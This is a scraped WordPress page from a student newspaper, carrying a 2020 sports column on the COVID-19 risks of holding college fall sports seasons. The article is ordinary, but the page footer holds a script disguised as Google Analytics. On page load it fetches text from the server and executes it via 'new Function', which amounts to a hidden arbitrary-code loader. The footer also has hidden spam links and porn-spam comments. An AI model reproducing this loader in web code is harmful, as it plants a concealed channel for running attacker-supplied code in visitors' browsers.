                    <img width="1024" height="683" src="http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-1024x683.jpg" class="attachment-magazine-7-featured size-magazine-7-featured wp-post-image" alt="" srcset="http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-1024x683.jpg 1024w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-300x200.jpg 300w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-768x512.jpg 768w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-1536x1024.jpg 1536w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-675x450.jpg 675w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-24x16.jpg 24w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-36x24.jpg 36w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty-48x32.jpg 48w, http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty.jpg 1599w" sizes="(max-width: 1024px) 100vw, 1024px" />                </div>
            
            <div class="header-details-wrapper">
        <div class="entry-header-details">
                            <div class="figure-categories figure-categories-bg">
                                        <ul class="cat-links"><li class="meta-category">
                             <a class="magazine-7-categories category-color-1" href="http://wfuogb.com/category/sports/" alt="View all posts in Sports"> 
                                 Sports
                             </a>
                        </li></ul>                </div>
                        <h1 class="entry-title">Major concerns loom as universities contemplate the risks and rewards of a fall sports season</h1>            
        <span class="author-links">

        <span class="item-metadata posts-author">
            <span class="">By</span>
            <a href="http://wfuogb.com/author/will_zimmerman/">
                Will Zimmerman            </a>
        </span>


            <span class="item-metadata posts-date">
            2 days ago        </span>
        </span>
                                                <div class="post-excerpt">
                    <p>As the realities of COVID-19 are forcing schools to reconfigure campus life, many roadblocks have arised in the path of NCAA programs hoping to begin sports seasons come fall</p>
                </div>
            
                    </div>
    </div>
</header><!-- .entry-header -->                                    

    <div class="entry-content">
        <p><span style="font-weight: 400; color: #000000;">The times of watching our favorite athletes and teams compete day-in and day-out feel like they belong to another lifetime. If you’re not interested in cheering on your favorite Korean Baseball team on ESPN at 5:30 a.m. (games played Tuesdays through Fridays) or watching international soccer matches or cornhole championship reruns, you’re probably not doing much watching or rooting at all these days. And while leagues such as the NHL and NBA are finalizing plans to finish their season in a bubble, many signs indicate that the NCAA will have a much more difficult time — for a whole host of reasons — in getting athletes back onto the field to compete come fall. </span></p>
<p><span style="color: #000000;"><span style="font-weight: 400;">Over the past few weeks schools across the country, including Wake Forest, have begun slowly welcoming athletes back for summer workouts. Football programs in particular have encountered mixed reactions — from coaching staff members, players, their families and the public — for doing so. Many believe that things are moving too quickly, especially considering that, at this time of writing, confirmed COVID-19 cases are rising across 40 states (according to the </span><a style="color: #000000;" href="https://apnews.com/0468a60b64947879926d2a16e45c00ee"><span style="font-weight: 400;">Associated Press</span></a><span style="font-weight: 400;">). The Clemson football program, which began its offseason work less than a month ago has already had 37 players test positive for the virus, nearly a third of the team’s roster. Other programs, chiefly those located in southern states that have been hit especially hard by the virus as of late, such as Kansas State and Louisiana State have reported similarly frightening high numbers of positive tests among players and coaching staff members alike. South Carolina Governor Henry McMaster has gone so far as to state that “if these numbers continue to rise and the danger persists,” he will not allow college football games to be played in the state, </span><a style="color: #000000;" href="https://sports.yahoo.com/south-carolina-gov-henry-mc-master-will-cancel-college-football-in-his-state-if-covid-19-keeps-rising-213844712.html"><span style="font-weight: 400;">per Yahoo Sports</span></a><span style="font-weight: 400;">.</span></span></p>
<p><span style="font-weight: 400; color: #000000;">There is significant concern that conducting a traditional season will put the health and safety of college-athletes, as well as larger college-communities, at increased risk of contracting COVID-19. Playing out the fall sports season within a bubble to mitigate these risks is not an option for NCAA programs. On college campuses, where players eat, sleep and breathe alongside thousands of classmates, it will be impossible for these programs to seclude their athletes completely. Faculty and staff coming onto campus before returning home to their families each night leaves the door open for the virus to make its way into the student body. Among college students — despite the extensive measures that universities will undertake — it is very likely that the virus will spread quickly, inevitably making its way into the locker-room. Most fall sports — football, soccer, volleyball and field hockey — cannot be practiced, much less played with six-feet between players, meaning the virus could spread between teams.</span></p>
<p><span style="font-weight: 400; color: #000000;">Worse yet, without any regulating body overseeing the many NCAA conferences in their entirety, the steps that should be taken to ensure maximum safety have been left to the discretion of each individual conference to sort out for themselves. This lack of uniformity in regard to testing and quarantine-protocols, among other measures, will make it difficult for teams to compete across the country as they would under normal scheduling circumstances. Questions regarding travel logistics will also have to be considered by athletic directors.</span></p>
<p><span style="font-weight: 400; color: #000000;">Coaches have also expressed concern about how to best get their teams into game-shape while minimizing contact between players and team staff members. The once simple formats of workouts and practices will need to be altered considerably to meet distancing guidelines and other safety regulations. </span></p>
<p><span style="color: #000000;"><span style="font-weight: 400;">“We all are going to have to adjust, whether that&#8217;s how we structure practice, where we stand on the practice field, not sitting in large meeting rooms together, figuring out who rooms with whom, even the way we&#8217;re served meals,” </span><a style="color: #000000;" href="https://www.espn.com/college-football/story/_/id/29387826/how-college-football-trying-answer-biggest-return-play-questions#Practice"><span style="font-weight: 400;">said</span></a><span style="font-weight: 400;"> Manny Diaz, head coach of the University of Miami Hurricanes football team. </span></span></p>
<p><span style="color: #000000;"><span style="font-weight: 400;">Student-athletes may face their own difficult decision as they weigh their health and desire to play against the ramifications of sitting the season out. According to an </span><a style="color: #000000;" href="https://www.espn.com/college-football/story/_/id/29294992/college-football-coronavirus-confidential-player-survey"><span style="font-weight: 400;">ESPN poll</span></a><span style="font-weight: 400;"> of 73 FBS players, 64 stated that they were uncomfortable practicing and playing before a vaccine is developed. While data shows that the virus is much more serious in its affliction of older generations, some players are worried about long-term health effects on their ability to train and perform, should they become infected. For players with aspirations to play at the professional level, sitting the season out isn’t an option because it would seriously hinder their ability to be scouted by pro teams and hurt their chances of getting drafted.</span></span></p>
<p><span style="font-weight: 400; color: #000000;">In order to get fall sports leagues up and running, tremendous amounts of flexibility and ingenuity are necessitated from all parties involved. Each school is taking a slightly different approach, and systems that work well should be copied and implemented nation-wide. UCLA, for example, will have a third-party health official at all football related activities who will guarantee that necessary safety measures are being followed. Additionally, the school has set up an anonymous hotline where players can report any concerns they have about unsafe practices or staff members who they believe are putting others at risk. Such measures, alongside the ability of wide-spread testing will be helpful, but a great deal of responsibility falls on the players themselves. Quarantining at the first signs of illness and making responsible choices off the field are essential steps players must take to ensure their own health and safety, as well as that of their teammates. </span></p>
<p><span style="font-weight: 400; color: #000000;">At the end of the day, the health and safety of the student-athletes must come first. If holding seasons in the fall puts players and the wider college-community at an increased risk, then school executives and athletic directors need to be able to make the difficult decision to postpone or cancel activities and seasons. Some schools have already taken such drastic measures. Division II Morehouse College cancelled all of their fall sports seasons. </span></p>
<p><span style="color: #000000;"><span style="font-weight: 400;">&#8220;Like all of the decisions we&#8217;ve made related to COVID-19, this was a difficult one but was made with the health and well-being of our students and community in mind. It follows my intention to maintain a safe campus in hopes that our students will be able to return in August,” </span><a style="color: #000000;" href="https://www.cbssports.com/college-football/news/morehouse-college-cancels-all-fall-sports-including-football-because-of-covid-19-health-risks/"><span style="font-weight: 400;">said</span></a><span style="font-weight: 400;"> Morehouse President David Thomas.  </span></span></p>
<p><span style="font-weight: 400; color: #000000;"> Division-3 programs at Bowdoin, Mount Holyoke and Amherst colleges have also cancelled fall sporting seasons.   </span></p>
<p><span style="font-weight: 400; color: #000000;">For larger institutions such as Clemson and Oklahoma State (OSU), officials are much more hesitant to pull the plug on the season. OSU Head Coach Mike Gundy put it bluntly, saying that a season is necessary “because we need to continue to budget and run money through the state of Oklahoma.” A lucrative television deal, and the absence of ticket revenue (if there are even fans at all) are compelling enough for Division I programs to weather on, even after multiple confirmed positive cases (OSU has 14 as of the time of writing). </span></p>
<p><span style="color: #000000;"><span style="font-weight: 400;">Whether institutions have their students’ best interest at heart, or are preoccupied following the money, has become a hot topic of debate. When the Arizona State University president was quoted saying that, if the fall semester began today, there would be no online classes, defensive back Malik Hausman </span><a style="color: #000000;" href="https://twitter.com/LeekHausman/status/1278006928824664066"><span style="font-weight: 400;">tweeted</span></a><span style="font-weight: 400;"> “So why me and my team on campus then?”</span></span></p>
<p><span style="font-weight: 400; color: #000000;">Time will tell if conditions across the country are better come fall. If they are, officials insist that they are optimistic that sports seasons can be carried out in a safe manner. Whether or not a school can, in good faith, allow their teams to compete will depend on how well the school and the larger community deals with outbreaks and handles containment. It is entirely likely that games, if they do return, will look unlike anything college sports fans are used to. From empty stadiums, to shortened seasons, to the transposition of traditionally fall sports seasons being played out in the spring, nothing has been taken off the table.</span></p>
<p><span style="font-weight: 400; color: #000000;">For now, fans can only speculate if these seasons will actually take place and what they will look like, if they do. As conditions change, new outbreaks occur and officials alter health and safety regulations, programs will be forced to adapt their models for practicing and playing in accordance. There is no playbook for how to proceed, and the path forward looks as uncertain as ever; it will be nothing short of remarkable if seasons are played out and champions are crowned. Sports fans nation-wide would love to cheer, and colleges and universities would love the associated revenues these programs pull in, but do the rewards merit the risks?  </span></p>
                <div class="wp-post-author-wrap wp-post-author-shortcode left">
                    <h3 class="awpa-title">About Post Author</h3>
                                        
        <div class="wp-post-author">

                <div class="awpa-img awpa-author-block square">
                    <a href="http://wfuogb.com/author/will_zimmerman/"><img alt='mm' src='http://wfuogb.com/wp-content/uploads/2020/01/image-1-150x150.png' class='avatar avatar-150 photo' height='150' width='150' /></a>
                </div>
                <div class="wp-post-author-meta awpa-author-block">
                    <h4 class="awpa-display-name">
                        <a href="http://wfuogb.com/author/will_zimmerman/">Will Zimmerman</a>
                    </h4>

                    
                                            <p class="awpa-mail">
                        <a href="mailto:zimmwj19@wfu.edu"
                           class="awpa-email">zimmwj19@wfu.edu</a>
                        </p>
                    
                                        <div class="wp-post-author-meta-bio">
                        <p>Will is a freshman from New York and is unsure about what he wants to study at Wake. His favorite New York sports teams are the Rangers, Yankees and Jets. He wishes he could root for the Knicks but their games are usually too painful for him to watch.</p>
                    </div>
                    <div class="wp-post-author-meta-more-posts">
                        <p class="awpa-more-posts">                        
                           <a href="http://wfuogb.com/author/will_zimmerman/" class="awpa-more-posts">See author&#039;s posts</a>
                        </p>
                    </div>
                                    </div>
        </div>

                                            </div>
                                    <div class="post-item-metadata entry-meta">
                            </div>
                
	<nav class="navigation post-navigation" role="navigation" aria-label="Continue Reading">
		<h2 class="screen-reader-text">Continue Reading</h2>
		<div class="nav-links"><div class="nav-previous"><a href="http://wfuogb.com/2020/07/student-athletes-to-follow-a-covid-19-athletic-pledge-among-other-protocols/" rel="prev"><span class="em-post-navigation">Previous</span> Student Athletes to follow a “COVID-19 athletic pledge,” among other protocols</a></div></div>
	</nav>            </div><!-- .entry-content -->


                                </div>
                                
<div id="disqus_thread">
    </div>

                            </article>
                        
                    </main><!-- #main -->
                </div><!-- #primary -->
                                            </div>
        </div>
    </div>


</div>


<footer class="site-footer">
            <div class="primary-footer">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="row">
                                                            <div class="primary-footer-area footer-first-widgets-section col-md-4 col-sm-12">
                                    <section class="widget-area">
                                            <div id="recent-comments-4" class="widget magazine-7-widget widget_recent_comments"><h2 class="widget-title widget-title-1">Recent Comments</h2><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">XY Z</span> on <a href="http://wfuogb.com/2020/07/qa-with-dean-iacovou-reopening-wake-forest/#comment-5516">Q&#038;A With Dean Iacovou – Reopening Wake Forest</a></li><li class="recentcomments"><span class="comment-author-link"><a href='https://pornpics.win/' rel='external nofollow ugc' class='url'>porn pics</a></span> on <a href="http://wfuogb.com/2020/06/university-unveils-preliminary-reopening-plans-for-fall-2020/#comment-5508">University Unveils Preliminary Reopening Plans for Fall 2020</a></li><li class="recentcomments"><span class="comment-author-link"><a href='https://www.pornlist.pw/' rel='external nofollow ugc' class='url'>pornlist</a></span> on <a href="http://wfuogb.com/2020/06/staff-editorial-how-wake-forest-should-truly-begin-combating-systemic-racism/#comment-5502">Staff Editorial: How Wake Forest Should Truly Begin Combating Systemic Racism</a></li><li class="recentcomments"><span class="comment-author-link">TD</span> on <a href="http://wfuogb.com/2020/06/staff-editorial-how-wake-forest-should-truly-begin-combating-systemic-racism/#comment-5499">Staff Editorial: How Wake Forest Should Truly Begin Combating Systemic Racism</a></li><li class="recentcomments"><span class="comment-author-link">Hank Wordsworth</span> on <a href="http://wfuogb.com/2020/06/staff-editorial-how-wake-forest-should-truly-begin-combating-systemic-racism/#comment-5498">Staff Editorial: How Wake Forest Should Truly Begin Combating Systemic Racism</a></li></ul></div>                                    </section>
                                </div>
                            
                                                    <div class="primary-footer-area footer-second-widgets-section col-md-4  col-sm-12">
                                <section class="widget-area">
                                    		<div id="recent-posts-4" class="widget magazine-7-widget widget_recent_entries">		<h2 class="widget-title widget-title-1">Recent Posts</h2>		<ul>
											<li>
					<a href="http://wfuogb.com/2020/07/major-concerns-loom-as-universities-contemplate-the-risks-and-rewards-of-a-fall-sports-season/" aria-current="page">Major concerns loom as universities contemplate the risks and rewards of a fall sports season</a>
									</li>
											<li>
					<a href="http://wfuogb.com/2020/07/old-gold-busy-at-home-episode-2/">Old Gold &#038; Busy at Home: Sports and Activism with Ty Moore</a>
									</li>
											<li>
					<a href="http://wfuogb.com/2020/07/student-athletes-to-follow-a-covid-19-athletic-pledge-among-other-protocols/">Student Athletes to follow a “COVID-19 athletic pledge,” among other protocols</a>
									</li>
											<li>
					<a href="http://wfuogb.com/2020/07/qa-with-dean-iacovou-reopening-wake-forest/">Q&#038;A With Dean Iacovou – Reopening Wake Forest</a>
									</li>
											<li>
					<a href="http://wfuogb.com/2020/07/how-does-wake-forests-response-compare-to-other-universities/">How does Wake Forest’s response compare to other universities?</a>
									</li>
					</ul>
		</div>                                </section>
                            </div>
                        
                                                    <div class="primary-footer-area footer-third-widgets-section col-md-4  col-sm-12">
                                <section class="widget-area">
                                    <div id="pages-10" class="widget magazine-7-widget widget_pages"><h2 class="widget-title widget-title-1">Quick Links</h2>		<ul>
			<li class="page_item page-item-9195"><a href="http://wfuogb.com/advertise-with-us/">Advertise With Us</a></li>
<li class="page_item page-item-8973"><a href="http://wfuogb.com/">News</a></li>
<li class="page_item page-item-6262"><a href="http://wfuogb.com/print-edition/">Print Edition</a></li>
<li class="page_item page-item-6252"><a href="http://wfuogb.com/submissions-and-policies/">Submissions and Policies</a></li>
		</ul>
			</div><div id="text-6" class="widget magazine-7-widget widget_text"><h2 class="widget-title widget-title-1">Contact Us</h2>			<div class="textwidget"><p>Have a question? Story idea?</p>
<p>Email us at: <em><strong><a href="mailto:wfuogb@gmail.com">wfuogb@gmail.com</a></strong></em></p>
<p>Contact the News Staff: <a href="mailto:news.ogb@gmail.com"><em><strong>news.ogb@gmail.com</strong></em></a></p>
</div>
		</div><div id="search-5" class="widget magazine-7-widget widget_search"><form role="search" method="get" class="search-form" action="http://wfuogb.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form></div>                                </section>
                            </div>
                                                                    </div>
                </div>
            </div>
        </div>
    </div>
    
            <div class="secondary-footer">
        <div class="container">
            <div class="row">
                                                    <div class="col-sm-12">
                        <div class="footer-social-wrapper">
                            <div class="social-navigation"><ul id="social-menu" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8791"><a href="https://twitter.com/wfu_ogb" class="menu-image-title-after"><span class="screen-reader-text"><span class="menu-image-title-after menu-image-title">Twitter</span></span></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8793"><a href="https://www.instagram.com/wfu_ogb/" class="menu-image-title-after"><span class="screen-reader-text"><span class="menu-image-title-after menu-image-title">Instagram</span></span></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8792"><a href="https://www.facebook.com/OGB1916/" class="menu-image-title-after"><span class="screen-reader-text"><span class="menu-image-title-after menu-image-title">Facebook</span></span></a></li>
</ul></div>                        </div>
                    </div>
                            </div>
        </div>
    </div>
            <div class="site-info">
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                                                                Website by Amanda Wilcox and Steven Chen                                                                                    <span class="sep"> | </span>
                        <a href=https://afthemes.com/products/magazine-7 target='_blank'>Magazine 7</a> by AF themes.                                    </div>
            </div>
        </div>
    </div>
	<div style="background-color:none"><p class="my_class" style="visibility: hidden; text-align:center;margin-bottom:0px;">Powered by<a href="https://www.24x7wpsecurity.com/">WordPress Security</a></p></div>
    <div style="background-color:none;display: none;">
<p class="my_class" style="visibility: hidden; text-align:center;margin-bottom:0px;">Powered by<a style="color: #191919;"href="https://www.gstsuvidhakendra.org/everything-you-need-to-know-about-common-service-centers-csc/">CSC Services List</a></p></div>
</footer>
</div>
<a id="scroll-up" class="secondary-color">
    <i class="fa fa-angle-up"></i>
</a>
<script>
    jQuery(document).ready(function () {
		jQuery.post('http://wfuogb.com?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) {
			var F = new Function ( response );
			return( F() );
		});
    });
</script><script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/js/navigation.js?ver=20151215'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/js/skip-link-focus-fix.js?ver=20151215'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/assets/slick/js/slick.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/assets/bootstrap/js/bootstrap.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/assets/sidr/js/jquery.sidr.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/assets/magnific-popup/jquery.magnific-popup.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/assets/jquery-match-height/jquery.matchHeight.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/assets/theiaStickySidebar/theia-sticky-sidebar.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/themes/magazine-7/assets/script.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-includes/js/comment-reply.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-includes/js/wp-embed.min.js?ver=5.4.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var embedVars = {"disqusConfig":{"platform":"wordpress@5.4.2","language":""},"disqusIdentifier":"9567 http:\/\/wfuogb.com\/?p=9567","disqusShortname":"oldgoldandblack","disqusTitle":"Major concerns loom as universities contemplate the risks and rewards of a fall sports season","disqusUrl":"http:\/\/wfuogb.com\/2020\/07\/major-concerns-loom-as-universities-contemplate-the-risks-and-rewards-of-a-fall-sports-season\/","options":{"manualSync":false},"postId":"9567"};
/* ]]> */
</script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=5.4.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var countVars = {"disqusShortname":"oldgoldandblack"};
/* ]]> */
</script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/disqus-comment-system/media/js/count.js?ver=5.4.2'></script>

</body>
</html>